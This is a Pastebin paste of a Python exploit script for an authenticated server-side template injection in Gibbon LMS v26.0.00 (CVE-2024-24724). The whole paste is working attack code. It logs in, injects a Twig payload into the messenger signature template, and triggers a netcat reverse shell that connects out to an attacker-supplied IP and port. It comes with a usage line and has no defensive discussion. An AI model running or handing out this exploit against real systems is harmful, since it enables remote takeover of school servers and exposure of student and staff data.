Advertisement
FlyFar

Gibbon LMS v26.0.00 - SSTI vulnerability - CVE-2024-24724

Apr 7th, 2024
876
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.87 KB | Cybersecurity | 0 0
  1. # Exploit Title: Gibbon LMS v26.0.00 - SSTI vulnerability
  2. # Date: 21.01.2024
  3. # Exploit Author: SecondX.io Research Team(Islam Rzayev,Fikrat Guliev, Ali Maharramli)
  4. # Vendor Homepage: https://gibbonedu.org/
  5. # Software Link: https://github.com/GibbonEdu/core
  6. # Version: v26.0.00
  7. # Tested on: Ubuntu 22.0
  8. # CVE : CVE-2024-24724
  9.  
  10. import requests
  11. import re
  12. import sys
  13.  
  14.  
  15. def login(target_host, target_port,email,password):
  16.      url = f'http://{target_host}:{target_port}/login.php?timeout=true'
  17.      headers = {"Content-Type": "multipart/form-data;
  18. boundary=---------------------------174475955731268836341556039466"}
  19.      data =
  20. f"-----------------------------174475955731268836341556039466\r\nContent-Disposition:
  21. form-data;
  22. name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
  23. form-data;
  24. name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
  25. form-data;
  26. name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
  27. form-data;
  28. name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
  29. form-data;
  30. name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
  31. form-data;
  32. name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n"
  33.      r = requests.post(url, headers=headers, data=data,
  34. allow_redirects=False)
  35.      Session_Cookie = re.split(r"\s+", r.headers['Set-Cookie'])
  36.      if Session_Cookie[4] is not None and '/index.php' in
  37. str(r.headers['Location']):
  38.          print("login successful!")
  39.  
  40.      return Session_Cookie[4]
  41.  
  42.  
  43.  
  44. def rce(cookie, target_host, target_port, attacker_ip, attacker_port):
  45.      url =
  46. f'http://{target_host}:{target_port}/modules/School%20Admin/messengerSettingsProcess.php'
  47.      headers = {"Content-Type": "multipart/form-data;
  48. boundary=---------------------------67142646631840027692410521651",
  49. "Cookie": cookie}
  50.      data =
  51. f"-----------------------------67142646631840027692410521651\r\nContent-Disposition:
  52. form-data; name=\"address\"\r\n\r\n/modules/School
  53. Admin/messengerSettings.php\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition:
  54. form-data;
  55. name=\"enableHomeScreenWidget\"\r\n\r\nY\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition:
  56. form-data; name=\"signatureTemplate\"\r\n\r\n{{{{[\'rm /tmp/f;mkfifo
  57. /tmp/f;cat /tmp/f|sh -i 2>&1|nc {attacker_ip} {attacker_port}
  58. >/tmp/f']|filter('system')}}}}\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"messageBcc\"\r\n\r\n\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"pinnedMessagesOnHome\"\r\n\r\nN\r\n-----------------------------67142646631840027692410521651--\r\n"
  59.      r = requests.post(url, headers=headers, data=data,
  60. allow_redirects=False)
  61.      if 'success0' in str(r.headers['Location']):
  62.          print("Payload uploaded successfully!")
  63.  
  64.  
  65.  
  66. def trigger(cookie, target_host, target_port):
  67.      url =
  68. f'http://{target_host}:{target_port}/index.php?q=/modules/School%20Admin/messengerSettings.php&return=success0'
  69.      headers = {"Cookie": cookie}
  70.      print("RCE successful!")
  71.      r = requests.get(url, headers=headers, allow_redirects=False)
  72.  
  73.  
  74. if __name__ == '__main__':
  75.      if len(sys.argv) != 7:
  76.          print("Usage: script.py <target_host> <target_port>
  77. <attacker_ip> <attacker_port> <email> <password>")
  78.          sys.exit(1)
  79.      cookie = login(sys.argv[1], sys.argv[2],sys.argv[5],sys.argv[6])
  80.      rce(cookie, sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])
  81.      trigger(cookie, sys.argv[1], sys.argv[2])
  82.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement